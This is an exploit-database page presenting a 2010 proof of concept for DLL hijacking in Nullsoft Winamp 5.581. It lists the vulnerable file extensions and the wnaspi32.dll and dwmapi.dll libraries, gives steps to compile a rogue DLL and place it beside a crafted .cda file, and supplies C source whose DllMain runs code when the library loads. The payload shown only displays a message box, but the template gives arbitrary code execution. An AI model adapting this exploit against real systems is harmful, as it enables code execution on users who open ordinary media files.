[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Nullsoft Winamp 5.581 DLL Hijacking Exploit (wnaspi32.dll)

Author
LiquidWorm
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13858
Category
local exploits
Date add
25-08-2010
Platform
windows
==========================================================
Nullsoft Winamp 5.581 DLL Hijacking Exploit (wnaspi32.dll)
==========================================================

/*
 
 Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit
 
 Vendor: Nullsoft.
 Product Web Page: http://www.winamp.com
 Affected Version: 5.581 (x86)
 
 Summary: Winamp is a media player for Windows-based PCs,
 written by Nullsoft, now a subsidiary of AOL. It is
 proprietary freeware/shareware, multi-format, extensible
 with plug-ins and skins, and is noted for its graphical
 sound visualization, playlist, and media library features.
 
 Desc: Winamp 5.581 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local
 level. The vulnerable extensions are .669, .aac, .aiff, .amf,
 .au, .avr, .b4s, .caf and .cda thru wnaspi32.dll and dwmapi.dll
 libraries.
 
 ----
 gcc -shared -o wnaspi32.dll winamp.c
 
 Compile and rename to wnaspi32.dll, create a file test.cda and put both
 files in same dir and execute.
 ----
 
 Tested on Microsoft Windows XP Professional SP3 (EN)
 
 
 
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com
 
 Zero Science Lab - http://www.zeroscience.mk
 
 
 25.08.2010
 
*/
 
 
#include <windows.h>
 
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
 
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        dll_mll();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
        break;
    }
 
    return TRUE;
}
 
int dll_mll()
{
    MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}



#  0day.today [2024-12-24]  #